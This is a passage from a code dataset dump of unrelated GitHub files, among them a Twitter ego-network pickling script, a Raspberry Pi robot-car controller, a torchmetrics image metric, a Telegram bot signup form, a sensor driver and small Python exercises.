rule.match(X_train)\n match = X_match.join(y_train, how='inner')\n correct_match = match[match[y_train.name] == rule.cl]\n coverage = len(correct_match) / y_val_counts[rule.cl] if y_val_counts[rule.cl] != 0 else 0\n precision = (len(correct_match) / len(match)) if len(match) != 0 else 0\n results.append(RuleEval(precision, coverage, rule))\n return results\n","repo_name":"EliskaSvobodova/PrismClassifier","sub_path":"prism/prism.py","file_name":"prism.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"38151269955","text":"import pickle\r\nimport time\r\n\"\"\"import multiprocessing\r\nfrom functools import partial\r\nfrom itertools import repeat\r\nimport csv\r\nimport os\r\nimport numpy as np\"\"\"\r\ndirectory='D:\\\\University\\\\Bachelor project\\\\codes\\\\dataset'\r\n\r\n#run it only the first time\r\n\"\"\"nets=[]\r\nfor filename in os.listdir(directory):\r\n if 
filename.endswith(\".edges\"):\r\n net = filename.strip('.edges')\r\n nets.append(net)\r\nwith open('network.txt', 'w') as f:\r\n for item in nets:\r\n f.write(\"%s\\n\" % item)\"\"\"\r\n\r\n\r\nclass Node(object):\r\n def __init__(self, id, follower, following, network, feature_names):\r\n self.id = id\r\n self.follower = follower\r\n self.following = following\r\n self.network = network\r\n #self.features = features\r\n self.feature_names = feature_names\r\n\r\ndef create_featnames(line):\r\n data_line = line.rstrip().split('\\t')\r\n return data_line[0].split()[1]\r\n\r\ndef read_neighbour_net_node(data_line,net,neighbours, network, nodes): #find neighbours and network of nodes\r\n #neighbours.append(data_line)\r\n for item in data_line:\r\n neighbours.append(item)\r\n if item in nodes:\r\n if net not in network[nodes.index(item)]:\r\n network[nodes.index(item)].append(net)\r\n else:\r\n nodes.append(item)\r\n network.append([net])\r\n\r\n\r\nneighbours = []\r\nnodes = []\r\nnetwork = []\r\nlist_egos = []\r\n\r\nwith open('network.txt', 'r') as f:\r\n for item in f:\r\n list_egos.append(item.strip('\\n'))\r\n\r\nn=0\r\nfor net in list_egos:\r\n address = \"%s\\\\edges\\\\%s.edges\" % (directory, net)\r\n f = open(address)\r\n neighbours.append([])\r\n for line in f:\r\n data_line = line.rstrip().split()\r\n read_neighbour_net_node(data_line, net, neighbours[n], network, nodes)\r\n n += 1\r\n\r\n\r\nfor ind,ego in enumerate(list_egos):\r\n followings = set()\r\n followers=set()\r\n featurenames={}\r\n features={}\r\n if ego not in nodes:\r\n for nei in neighbours[ind]:\r\n followings.add(nei)\r\n networks_of_id=[ego]\r\n f = open(\"%s\\\\featnames\\\\%s.featnames\" % (directory, ego))\r\n feat_names = []\r\n feat_names=list(map(create_featnames, f))\r\n featurenames[ego] = feat_names\r\n\r\n f = open(\"%s\\\\egofeat\\\\%s.egofeat\" % (directory, ego))\r\n for line in f:\r\n data_line = line.rstrip().split('\\t')\r\n features[ego] = data_line[0].split()\r\n\r\n one_features = []\r\n name_one_features=[]\r\n for ind,feat in enumerate(features[ego]):\r\n if feat=='1':\r\n one_features.append(feat)\r\n name_one_features.append(featurenames[ego][ind])\r\n\r\n features[ego]=one_features\r\n featurenames[ego]=name_one_features\r\n\r\n with open(ego+'.pkl', 'wb') as output:\r\n node_inst = Node(ego,followers,followings,networks_of_id,featurenames)\r\n pickle.dump(node_inst, output)\r\n del node_inst\r\n\r\n\r\n\r\nfor ind,id in enumerate(nodes):\r\n followers=set()\r\n followings=set()\r\n featurenames={}\r\n features={}\r\n networks_of_id=network[ind]\r\n indexes=[]\r\n for x,net in enumerate(list_egos):\r\n for y in networks_of_id:\r\n if net==y:\r\n indexes.append(x)\r\n for n in indexes: # n:number of networks for each node\r\n for count,nei in enumerate(neighbours[n]):\r\n if nei==id:\r\n if(count%2==0):\r\n followings.add(neighbours[n][count+1])\r\n else:\r\n followers.add(neighbours[n][count-1])\r\n f = open(\"%s\\\\featnames\\\\%s.featnames\" % (directory, str(list_egos[n])))\r\n featurenames[list_egos[n]]=list(map(create_featnames, f))\r\n\r\n if id not in list_egos:\r\n for item in networks_of_id:\r\n followers.add(item) #\r\n f = open(\"%s\\\\feat\\\\%s.feat\" % (directory, str(list_egos[n])))\r\n feats=[]\r\n for count, line in enumerate(f):\r\n data_line = line.rstrip().split('\\t')\r\n l=data_line[0].split()\r\n if l[0]==id:\r\n feats=l[1:]\r\n features[list_egos[n]]=feats\r\n break\r\n else:\r\n f = open(\"%s\\\\egofeat\\\\%s.egofeat\" % (directory, str(list_egos[n])))\r\n for 
item in neighbours[n]:\r\n followings.add(item)\r\n networks_of_id.append(id)\r\n for count, line in enumerate(f):\r\n data_line = line.rstrip().split('\\t')\r\n features[list_egos[n]] = data_line[0].split()\r\n\r\n one_features = []\r\n name_one_features = []\r\n for inde, feat in enumerate(features[list_egos[n]]):\r\n if feat == '1':\r\n one_features.append(feat)\r\n name_one_features.append(featurenames[list_egos[n]][inde])\r\n\r\n features[list_egos[n]] = one_features\r\n featurenames[list_egos[n]] = name_one_features\r\n\r\n with open(id + '.pkl', 'wb') as output:\r\n node_inst = Node(id, followers, followings, networks_of_id, featurenames)\r\n pickle.dump(node_inst, output)\r\n del node_inst\r\n\r\n\r\n\r\n\r\n","repo_name":"ShararehY/InfluenceGraph-Twitter","sub_path":"make_pickle.py","file_name":"make_pickle.py","file_ext":"py","file_size_in_byte":5170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"7506647474","text":"from rcar import rsimplecar\nfrom rcar import rstandardcar\nimport os\nimport sys\nimport cv2\nimport copy\nfrom picamera import PiCamera\nfrom training.units import *\nimport numpy\nimport time\nimport datetime\nfrom threading import Thread\nfrom pistreaming import server\nimport random\nimport picamera.array\nfrom gopigo import *\n\nRUNNING = True\nLSPEED = 150\nRSPEED= 130\nRADIUS = 2\ndef userinput():\n global RUNNING\n while True:\n if input(\"input\") == \"x\":\n break;\n RUNNING = False\n\ndef main(arg):\n # initialize input\n # Thread(target=userinput).start()\n\n #initialize car\n # car = rsimplecar.SimpleCar(speed=180,radius=1.5,freq=10)\n # car = rstandardcar.Car(acceleration=6,radius=3,freq=20)\n # car.start()\n\n #initialize decision network\n ANN = Network.fromFile(sys.argv[1])\n DNN = Network.fromFile(\"./training/nnd.save\")\n\n #main loop\n try:\n with picamera.PiCamera() as camera:\n with picamera.array.PiRGBArray(camera) as output:\n while RUNNING:\n output.truncate(0)\n camera.capture(output, 'rgb',use_video_port=True)\n img = cv2.cvtColor(output.array, cv2.COLOR_BGR2GRAY)\n img = cv2.GaussianBlur(img,(5,5),0)\n img = cv2.resize(img,(16,12))\n img = np.multiply(1/255,np.ndarray.flatten(img))\n res = ANN.evaluate(img)\n\n L = 0\n S = 1\n R = 2\n DETECT_THRESHOLD = 1\n COOLING = 2\n detect_count = 0\n cooling = 0\n curr_decision = res.index(max(res))\n # branch_decisions = [S,S,L,S,S,R,S,S,L,R]\n # if DNN.evaluate(img)[0] > 0.5:\n # print(\"\")\n # if detect_count < DETECT_THRESHOLD:\n # detect_count += 1\n # else:\n # curr_decision = branch_decisions.pop()\n # print(\"\"%(curr_decision))\n # cooling += 1\n # if cooling == COOLING:\n # detect_count = 0\n # cooling = 0\n # else:\n # detect_count = 0\n # cooling = 0\n # motion\n # if random.random() > 0.2: car.w()\n if curr_decision == L:\n left()\n time.sleep(0.3)\n # car.a()\n print(\"\")\n elif curr_decision == S:\n straight()\n print(\"\")\n elif curr_decision == R:\n right()\n # car.d()\n print(\"\")\n else:\n assert False\n # input(\"hit any key to continue\")\n except KeyboardInterrupt:\n stop()\n # car.stop()\n # car.shutdown()\n print(\"Thank you for using auto. 
Bye!\")\ndef left():\n motor1(1,int(0.6*LSPEED*(1-0.5/RADIUS)))\n motor2(1,int(0.6*RSPEED*(1+0.5/RADIUS)))\n\ndef right():\n motor1(1,int(0.8*LSPEED*(1+0.5/RADIUS)))\n motor2(1,int(0.8*RSPEED*(1-0.5/RADIUS)))\n\ndef straight():\n motor1(1,LSPEED)\n motor2(1,RSPEED)\ndef stop():\n motor2(1,0)\n motor1(1,0)\nif __name__ == \"__main__\":\n main(\"\")\n\n\n# if len(sys.argv) > 3: cv2.imwrite(os.path.join(sys.argv[2],str(decision)+\"-\"+str(datetime.datetime.now())+\".jpg\"),img0)\n\n","repo_name":"zhichul/pi-bob","sub_path":"src/rplugin/auto.py","file_name":"auto.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"9421091012","text":"from typing import Tuple\n\nimport torch\nfrom torch import Tensor\nfrom typing_extensions import Literal\n\nfrom torchmetrics.utilities.checks import _check_same_shape\nfrom torchmetrics.utilities.distributed import reduce\n\n\ndef _sam_update(preds: Tensor, target: Tensor) -> Tuple[Tensor, Tensor]:\n \"\"\"Update and returns variables required to compute Spectral Angle Mapper.\n\n Args:\n preds: Predicted tensor\n target: Ground truth tensor\n\n \"\"\"\n if preds.dtype != target.dtype:\n raise TypeError(\n \"Expected `preds` and `target` to have the same data type.\"\n f\" Got preds: {preds.dtype} and target: {target.dtype}.\"\n )\n _check_same_shape(preds, target)\n if len(preds.shape) != 4:\n raise ValueError(\n \"Expected `preds` and `target` to have BxCxHxW shape.\"\n f\" Got preds: {preds.shape} and target: {target.shape}.\"\n )\n if (preds.shape[1] <= 1) or (target.shape[1] <= 1):\n raise ValueError(\n \"Expected channel dimension of `preds` and `target` to be larger than 1.\"\n f\" Got preds: {preds.shape[1]} and target: {target.shape[1]}.\"\n )\n return preds, target\n\n\ndef _sam_compute(\n preds: Tensor,\n target: Tensor,\n reduction: Literal[\"elementwise_mean\", \"sum\", \"none\", None] = \"elementwise_mean\",\n) -> Tensor:\n \"\"\"Compute Spectral Angle Mapper.\n\n Args:\n preds: estimated image\n target: ground truth image\n reduction: a method to reduce metric score over labels.\n\n - ``'elementwise_mean'``: takes the mean (default)\n - ``'sum'``: takes the sum\n - ``'none'`` or ``None``: no reduction will be applied\n\n Example:\n >>> gen = torch.manual_seed(42)\n >>> preds = torch.rand([16, 3, 16, 16], generator=gen)\n >>> target = torch.rand([16, 3, 16, 16], generator=gen)\n >>> preds, target = _sam_update(preds, target)\n >>> _sam_compute(preds, target)\n tensor(0.5914)\n\n \"\"\"\n dot_product = (preds * target).sum(dim=1)\n preds_norm = preds.norm(dim=1)\n target_norm = target.norm(dim=1)\n sam_score = torch.clamp(dot_product / (preds_norm * target_norm), -1, 1).acos()\n return reduce(sam_score, reduction)\n\n\ndef spectral_angle_mapper(\n preds: Tensor,\n target: Tensor,\n reduction: Literal[\"elementwise_mean\", \"sum\", \"none\", None] = \"elementwise_mean\",\n) -> Tensor:\n \"\"\"Universal Spectral Angle Mapper.\n\n Args:\n preds: estimated image\n target: ground truth image\n reduction: a method to reduce metric score over labels.\n\n - ``'elementwise_mean'``: takes the mean (default)\n - ``'sum'``: takes the sum\n - ``'none'`` or ``None``: no reduction will be applied\n\n Return:\n Tensor with Spectral Angle Mapper score\n\n Raises:\n TypeError:\n If ``preds`` and ``target`` don't have the same data type.\n ValueError:\n If ``preds`` and ``target`` don't have ``BxCxHxW shape``.\n\n Example:\n >>> from torchmetrics.functional.image 
import spectral_angle_mapper\n >>> gen = torch.manual_seed(42)\n >>> preds = torch.rand([16, 3, 16, 16], generator=gen)\n >>> target = torch.rand([16, 3, 16, 16], generator=gen)\n >>> spectral_angle_mapper(preds, target)\n tensor(0.5914)\n\n References:\n [1] Roberta H. Yuhas, Alexander F. H. Goetz and Joe W. Boardman, \"Discrimination among semi-arid\n landscape endmembers using the Spectral Angle Mapper (SAM) algorithm\" in PL, Summaries of the Third Annual JPL\n Airborne Geoscience Workshop, vol. 1, June 1, 1992.\n\n \"\"\"\n preds, target = _sam_update(preds, target)\n return _sam_compute(preds, target, reduction)\n","repo_name":"Lightning-AI/torchmetrics","sub_path":"src/torchmetrics/functional/image/sam.py","file_name":"sam.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","stars":1718,"dataset":"github-code","pt":"4"} +{"seq_id":"8600272482","text":"from aiogram.dispatcher import FSMContext\r\nfrom aiogram.types import Message, CallbackQuery\r\n\r\nfrom handlers.utils import track_user_activity\r\nfrom keyboards import directions_kb, division_kb, topics_kb, kb2b\r\nfrom loader import dp, db, bot\r\nfrom my_logger import logger\r\nfrom config import directions_list, divisions_list\r\n\r\n\r\n@dp.callback_query_handler(text='expert_start')\r\nasync def expert_start(call: CallbackQuery, state: FSMContext):\r\n user = call.from_user\r\n\r\n if db.get_applicant(user.id) is not None:\r\n track_user_activity(user.id, \"experts\", \"Сменить роль\")\r\n\r\n db.remove_user(\"applicants\", user.id)\r\n\r\n logger.debug(f\"Applicant {user.id} was removed from database\")\r\n\r\n logger.debug(f\"Expert {user.id} entered expert_start handler\")\r\n date = call.message.date.strftime('%d.%m.%Y %H:%M')\r\n try:\r\n db.add_expert(user.id, date, user.username, user.first_name,\r\n user.last_name, \"Заполняет анкету\")\r\n await call.answer(cache_time=5)\r\n await call.message.answer(text=\"Как вас зовут?\\n\\n\"\r\n \"Формат: Алексей\",\r\n disable_notification=True)\r\n await call.message.edit_reply_markup()\r\n await state.set_state('expert_1')\r\n except Exception as e:\r\n logger.debug(f\"Expert {user.id} was not recorded as a new user: {e}\")\r\n\r\n\r\n@dp.message_handler(state='expert_1')\r\nasync def expert_1(message: Message, state: FSMContext):\r\n user_id = message.from_user.id\r\n\r\n db.update_user('experts', 'wr_fullname', user_id, message.text)\r\n await message.answer(text=\"Выберите направление:\",\r\n reply_markup=directions_kb,\r\n disable_notification=True)\r\n await state.set_state('expert_2')\r\n logger.debug(f\"Expert {user_id} entered expert_1 handler\")\r\n\r\n\r\n@dp.callback_query_handler(state='expert_2')\r\nasync def expert_2(call: CallbackQuery, state: FSMContext):\r\n user_id = call.from_user.id\r\n\r\n db.update_user('experts', 'direction', user_id, directions_list[int(call.data)])\r\n await call.answer(cache_time=5)\r\n await call.message.answer(text=\"Выберите дивизион:\",\r\n reply_markup=division_kb,\r\n disable_notification=True)\r\n await call.message.edit_reply_markup()\r\n await state.set_state('expert_3')\r\n logger.debug(f\"Expert {user_id} entered expert_2 handler\")\r\n\r\n\r\n@dp.callback_query_handler(state='expert_3')\r\nasync def expert_2_1(call: CallbackQuery, state: FSMContext):\r\n user_id = call.from_user.id\r\n\r\n if call.data == 'other':\r\n await call.message.answer(\"Напишите название вашего дивизиона:\")\r\n await call.message.edit_reply_markup()\r\n await state.set_state('expert_3.1')\r\n 
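    # a predefined division was chosen from the keyboard; store it and move on to the expertise question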
else:\r\n db.update_user('experts', 'division', user_id, divisions_list[int(call.data)])\r\n await call.answer(cache_time=5)\r\n await call.message.answer(text=\"Расскажите о своей экспертизе\\n\\n\"\r\n \"Пример: Разрабатываю frontend-часть enterprise веб-приложений и пользовательские \"\r\n \"элементы управления. Свободно владею HTML5, CSS3 (LESS/SASS), DOM, \"\r\n \"JavaScript/TypeScript. Имею опыт работы с Angular/React/Vue.js, работаю с Git, \"\r\n \"BootsTrap. Знаю принципы и технологии веб-сайтов, асинхронных веб-приложений, MVC, \"\r\n \"Razor, http-интерфейсы, умею работать с графическими редакторами, читаю код на \"\r\n \"C# и Java\",\r\n disable_notification=True)\r\n await call.message.edit_reply_markup()\r\n await state.set_state('expert_5')\r\n logger.debug(f\"Expert {user_id} entered expert_2_1 handler with cd {call.data}\")\r\n\r\n\r\n@dp.message_handler(state='expert_3.1')\r\nasync def expert_3(message: Message, state: FSMContext):\r\n user_id = message.from_user.id\r\n\r\n db.update_user('experts', 'wr_division', user_id, message.text)\r\n await message.answer(text=\"Расскажите о своей экспертизе\\n\\n\"\r\n \"Пример: Разрабатываю frontend-часть enterprise веб-приложений и пользовательские \"\r\n \"элементы управления. Свободно владею HTML5, CSS3 (LESS/SASS), DOM, \"\r\n \"JavaScript/TypeScript. Имею опыт работы с Angular/React /Vue.js, работаю с Git, \"\r\n \"BootsTrap. Знаю принципы и технологии веб-сайтов, асинхронных веб-приложений, MVC, \"\r\n \"Razor, http-интерфейсы, умею работать с графическими редакторами, читаю код на \"\r\n \"C# и Java\",\r\n disable_notification=True)\r\n await state.set_state('expert_5')\r\n logger.debug(f\"Expert {user_id} entered expert_3 handler\")\r\n\r\n\r\n@dp.message_handler(state='expert_4')\r\nasync def expert_4(message: Message, state: FSMContext):\r\n user_id = message.from_user.id\r\n\r\n db.update_user('experts', 'position', user_id, message.text)\r\n await message.answer(text=\"Расскажите о своей экспертизе\\n\\n\"\r\n \"Пример: Разрабатываю frontend-часть enterprise веб-приложений и пользовательские \"\r\n \"элементы управления. Свободно владею HTML5, CSS3 (LESS/SASS), DOM, \"\r\n \"JavaScript/TypeScript. Имею опыт работы с Angular/React /Vue.js, работаю с Git, \"\r\n \"BootsTrap. 
Знаю принципы и технологии веб-сайтов, асинхронных веб-приложений, MVC, \"\r\n \"Razor, http-интерфейсы, умею работать с графическими редакторами, читаю код на \"\r\n \"C# и Java\",\r\n disable_notification=True)\r\n await state.set_state('expert_5')\r\n logger.debug(f\"Expert {user_id} entered expert_4 handler\")\r\n\r\n\r\n@dp.message_handler(state='expert_5')\r\nasync def expert_5(message: Message, state: FSMContext):\r\n user_id = message.from_user.id\r\n\r\n db.update_user('experts', 'profile', user_id, message.text)\r\n await message.answer(text=\"С удовольствием поговорю на следующие темы:\",\r\n reply_markup=topics_kb(),\r\n disable_notification=True)\r\n\r\n await state.set_state('expert_6')\r\n logger.debug(f\"Expert {user_id} entered expert_5 handler\")\r\n\r\n\r\n@dp.callback_query_handler(state='expert_6')\r\nasync def expert_6(call: CallbackQuery, state: FSMContext):\r\n user_id = call.from_user.id\r\n\r\n cdata = call.data\r\n if cdata != 'done': # if user don't press \"Done\" button\r\n async with state.proxy() as data:\r\n if 'list' in data: # if it is not first click on button and list is not exist\r\n if int(cdata) in data['list']: # if button is already chosen\r\n data['list'].remove(int(cdata))\r\n else:\r\n data['list'].append(int(cdata))\r\n else:\r\n data['list'] = [int(cdata)]\r\n sdata = await state.get_data()\r\n await call.message.edit_reply_markup(topics_kb(sdata['list']))\r\n await state.set_state('expert_6')\r\n else:\r\n sdata = await state.get_data()\r\n if sdata.get('list') is None or not sdata['list']: # if user did not choose any button\r\n await call.answer()\r\n await call.message.answer('Пожалуйста, выберите минимум одну тему.')\r\n await state.set_state('expert_6')\r\n else:\r\n await call.message.edit_reply_markup()\r\n\r\n db.update_user('experts', 'topics', user_id, str(sdata['list'])[1:-1])\r\n username = db.get_expert(user_id)[2]\r\n if not username:\r\n await call.message.answer(text=\"Напишите ваше имя пользователя (username) в Telegram. \"\r\n \"Если вы его не знаете, перейдите в «Настройки», затем нажмите \"\r\n \"на «Изменить профиль» (инструкция на изображениях ниже).\\n\\n\"\r\n \"Формат: @anthonytech\")\r\n await bot.send_photo(chat_id=user_id,\r\n photo='https://i.ibb.co/7Gbg9c8/1.png',\r\n disable_notification=True)\r\n await bot.send_photo(chat_id=user_id,\r\n photo='https://i.ibb.co/m4Cmx9C/2.png',\r\n disable_notification=True)\r\n await bot.send_photo(chat_id=user_id,\r\n photo='https://i.ibb.co/hdBN7Bm/3.png',\r\n disable_notification=True)\r\n await bot.send_photo(chat_id=user_id,\r\n photo='https://i.ibb.co/f9yjs6Z/4.png',\r\n disable_notification=True)\r\n await state.set_state('expert_7')\r\n else:\r\n await call.message.answer(\"Нажмите \\\"Да\\\", чтобы мы могли показывать ваши контактные данные в телеграм \"\r\n f\"(@{call.from_user.username}) соискателям. Так они смогут связаться с вами, \"\r\n \"если проблема с конференцией. 
Если вы не хотите, \"\r\n \"чтобы вам писали соискатели, нажмите \\\"Нет\\\"\",\r\n reply_markup=kb2b(\"Да\", \"set_agreement_to_show_contacts_yes\",\r\n \"Нет\", \"set_agreement_to_show_contacts_no\"))\r\n await state.set_state('expert_8')\r\n logger.debug(f\"Expert {user_id} entered expert_6 handler with cd {call.data} and sd {sdata}\")\r\n\r\n\r\n@dp.message_handler(state='expert_7')\r\nasync def expert_7(message: Message, state: FSMContext):\r\n user_id = message.from_user.id\r\n\r\n text = message.text\r\n if text[0] == '@':\r\n db.update_user('experts', 'wr_username', user_id, message.text[1:].rstrip())\r\n\r\n await message.answer(\"Нажмите \\\"Да\\\", чтобы мы могли показывать ваши контактные данные в телеграм \"\r\n f\"(@{message.from_user.username}) соискателям. Так они смогут связаться с вами, если \"\r\n \"проблема с конференцией. Если вы не хотите, \"\r\n \"чтобы вам писали соискатели, нажмите \\\"Нет\\\"\",\r\n reply_markup=kb2b(\"Да\", \"yes\", \"Нет\", \"no\"))\r\n await state.set_state('expert_8')\r\n else:\r\n await message.answer(text=\"Пожалуйста, напишите свой username корректно, начиная с '@'\",\r\n disable_notification=True)\r\n await state.set_state('expert_7')\r\n logger.debug(f\"Expert {user_id} entered expert_7 handler with message: {text}\")\r\n\r\n\r\n@dp.callback_query_handler(state='expert_8')\r\nasync def expert_8(call: CallbackQuery, state: FSMContext):\r\n user_id = call.from_user.id\r\n\r\n if \"yes\" == call.data:\r\n agree_to_show_contacts = True\r\n else:\r\n agree_to_show_contacts = False\r\n db.update_user('experts', 'agree_to_show_contacts', user_id, agree_to_show_contacts)\r\n\r\n await call.message.edit_reply_markup()\r\n await call.message.answer(\"Поздравляем, вы заполнили анкету. \"\r\n \"Теперь дело за модераторами. 
Они рассмотрят Вашу анкету и \"\r\n \"в ближайшее время предоставят Вам функционал бота или отправят анкету на доработку\")\r\n db.update_user('experts', 'status', user_id, \"На модерации\")\r\n await state.finish()\r\n\r\n logger.debug(f\"Expert {user_id} entered expert_8 handler with cd {call.data}\")\r\n","repo_name":"Barashkis/BuddyCoffee","sub_path":"handlers/expert_form.py","file_name":"expert_form.py","file_ext":"py","file_size_in_byte":13396,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"40142739192","text":"import re\n\nimport pyastyle\nimport pytest\n\n\ndef test_version_is_string():\n ver = pyastyle.version()\n assert isinstance(ver, str)\n\n\ndef test_version_is_numberic_like():\n ver = pyastyle.version()\n assert re.match(r'^(\\d+\\.){2,}(\\d+\\w?)$', ver)\n\n\ndef test_format_simple_code():\n code = '''\\\nint main(void)\n{\n }'''\n expected = '''\\\nint main(void)\n{\n}'''\n assert expected == pyastyle.format(code, '--style=allman')\n\n\ndef test_format_invalid_options():\n with pytest.raises(pyastyle.error) as exc:\n pyastyle.format('int main() {}', '--invalid-options-hereXXXXXX')\n assert '[130]' in str(exc)\n","repo_name":"timonwong/pyastyle","sub_path":"tests/test_pyastyle.py","file_name":"test_pyastyle.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"4"} +{"seq_id":"10251327296","text":"#...................Drive a pressure/temperature sensor..................\r\n#Author: James Bramante\r\n#Date: May 8, 2017\r\n\r\nimport ms5837\r\nimport threading\r\nimport time\r\nimport statistics as stats\r\n\r\nclass SensorDriver(object):\r\n\r\n def __init__(self, samplerate = 100., density = 997., baseTime = 0.):\r\n \"\"\" Constructor\r\n\r\n :type samplerate: float\r\n :type density: float\r\n\r\n :param samplerate: rate at which to sample the pressure sensor, in Hz\r\n :param density: density of the water, kg m^-3\r\n \"\"\"\r\n\r\n #Parse the input parameters\r\n self.samplerate = samplerate\r\n self.density = density\r\n\r\n #FINAL variables\r\n self.I2CBUS = 1\r\n self.GRAV = 9.81\r\n\r\n #Initialize the sensor\r\n self.sensor = ms5837.MS5837_30BA()\r\n test1 = self.sensor.init()\r\n test2 = self.sensor.read()\r\n self.initialized = test1 & test2\r\n self.running = False\r\n\r\n #Initialize output variables\r\n if (baseTime == 0.):\r\n self.baseTime = time.time()\r\n else:\r\n self.baseTime = baseTime\r\n \r\n self.basepress = []\r\n for x in range(1,10):\r\n self.sensor.read()\r\n self.basepress += [self.sensor.pressure()]\r\n time.sleep(0.3)\r\n self.basepress = stats.mean(self.basepress)\r\n self.time = [time.time()-self.baseTime]\r\n self.temp = [self.sensor.temperature()]\r\n self.press = [self.basepress]\r\n self.depth = [0]\r\n\r\n def daemonize(self):\r\n #Daemonize the run function and thread it\r\n self.thread = threading.Thread(target=self.run,args=(),daemon=True)\r\n self.thread.start()\r\n\r\n #Collects sensor data in the background\r\n def run(self):\r\n\r\n self.running = True\r\n while self.running:\r\n #Produce pressure and temperature and depth data\r\n self.sensor.read()\r\n self.time += [time.time()-self.baseTime]\r\n self.temp += [self.sensor.temperature()]\r\n self.press += [self.sensor.pressure()]\r\n self.depth += [(self.sensor.pressure() - self.basepress)/self.density/self.GRAV]\r\n\r\n #Wait designated interval\r\n time.sleep(1/self.samplerate)\r\n\r\n #Stop sampling data\r\n def stop(self):\r\n 
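        """Stop sampling; the background run() loop exits on its next pass."""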
self.running = False\r\n\r\n #Reset the sensor and start recording again, but keep parameters\r\n def reset(self):\r\n self.running = False\r\n\r\n #Re-initialize the sensor\r\n self.sensor = ms5837.MS5837_30BA()\r\n self.sensor.init()\r\n\r\n #Re-initialize everything\r\n self.baseTime = time.time()\r\n self.basepress = []\r\n for x in range(1,10):\r\n self.sensor.read()\r\n self.basepress += [self.sensor.pressure()]\r\n time.sleep(0.3)\r\n self.basepress = stats.mean(self.basepress)\r\n self.time = [time.time()-self.baseTime]\r\n self.temp = [self.sensor.temperature()]\r\n self.press = [self.basepress]\r\n self.depth = [0]\r\n\r\n #Restart the recording thread\r\n self.daemonize()\r\n\r\n #Reset the recorded times to a new time origin\r\n def resetClock(self):\r\n newTime = time.time()\r\n self.time -= (newTime - self.baseTime)\r\n self.baseTime = newTime\r\n\r\n #Set parameter values\r\n def setDensity(self,den):\r\n self.density = den\r\n\r\n def setSamplerate(self,rat):\r\n self.samplerate = rat\r\n\r\n #Read recorded values and reset the variables doing it\r\n def readValues(self):\r\n #Make sure all of the data lines up\r\n t = self.time\r\n tempLength = len(t)-1\r\n p = self.press[:tempLength]\r\n T = self.temp[:tempLength]\r\n d = self.depth[:tempLength]\r\n \r\n #Only keep the data that will not have been reported yet\r\n tempLength += 1\r\n self.time = self.time[tempLength:]\r\n self.press = self.press[tempLength:]\r\n self.temp = self.temp[tempLength:]\r\n self.depth = self.depth[tempLength:]\r\n \r\n return (t,p,T,d)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n","repo_name":"BramanTyphoon/Abrasion_GUI","sub_path":"sensor_driver.py","file_name":"sensor_driver.py","file_ext":"py","file_size_in_byte":4114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"26769143105","text":"\"\"\"\nUloha: Napiste program, ktory vypocita faktorial zadaneho cisla pomocou cyklov for a while.\n\"\"\"\n\n\ndef for_factorial(num):\n \"\"\"\n Vypocet faktorialu pomocou for cyklu\n\n :param num: cislo, ktoreho faktorial pocitame\n :return: vypocitany faktorial\n \"\"\"\n\n for_fact = 1\n\n for i in range(num, 0, -1):\n for_fact *= i\n\n return for_fact\n\n\ndef while_factorial(num):\n \"\"\"\n Vypocet faktorialu pomocou while cyklu\n\n :param num: cislo, ktoreho faktorial pocitame\n :return: vypocitany faktorial\n \"\"\"\n\n while_fact = 1\n\n while num > 0:\n while_fact *= num\n num -= 1\n\n return while_fact\n\n\n# nacitanie cisla a nasledny vypis jeho faktorialu\nnumber = int(input(\"Enter number: \"))\nprint(\"Vypocitany faktorial pomocou for cyklu: \", for_factorial(number))\nprint(\"Vypocitany faktorial pomocou while cyklu: \", while_factorial(number))","repo_name":"ZalGe/Prax_Python-MTF_STU_2023","sub_path":"factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"sk","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"73330403957","text":"from threading import Condition\nfrom threading import Thread\nfrom collections import deque\n\nclass BoundedBlockingQueue(object):\n\n def __init__(self, capacity: int):\n self.max_size = capacity\n self.curr_size = 0\n self.cond = Condition()\n self.q = deque()\n \n\n def enqueue(self, element: int) -> None:\n \n self.cond.acquire()\n while self.curr_size == self.max_size:\n self.cond.wait()\n \n self.q.append(element)\n self.curr_size += 1\n self.cond.notifyAll()\n self.cond.release()\n\n def dequeue(self) -> int:\n 
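        # blocks while the queue is empty; a producer's notifyAll() in enqueue wakes the waiting consumer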
\n self.cond.acquire()\n while self.curr_size == 0:\n self.cond.wait()\n \n returned_element = self.q.popleft()\n self.curr_size -= 1\n self.cond.notifyAll()\n self.cond.release()\n \n return returned_element\n \n def size(self) -> int:\n return self.curr_size","repo_name":"irupawala/Ibrahim-List","sub_path":"Submits/Multithreading/[5] Design a Bounded Blocking Queue/Leetcode #1188.py","file_name":"Leetcode #1188.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"41991689013","text":"from collections import Counter\nfrom math import *\n\n\nextra = [\"'\", '\"', ',', ':', ')', '(', '=', '-',\n '_', '+', '*', '&', '^', '%', '$', '#', '@', '!', '<', '>',\n '}', '{', '[', ']', '`', '`', \"/\", \";\"]\n\n\ndef docfreq(text):\n text_list = text.split()\n counter = Counter()\n for word in text_list:\n counter[word] += 1\n return counter\n \ndef inv_doc_freq(text, word, length):\n #idf = {}\n #for word in docfreq(text).keys:\n #idf[word] = log10(length/docfreq(text)[word])\n idf = log10(length/docfreq(text)[word])\n return idf\n\ndef word_weight(text):\n weights = {}\n for letter in text:\n if letter in extra:\n text = text.replace(letter, '')\n if letter == '.':\n text = text.replace(letter, ' ')\n splits = text.split()\n length = len(splits)\n for word in splits:\n weights[word] = log(1 + docfreq(text)[word])\\\n * log10(inv_doc_freq(text, word, 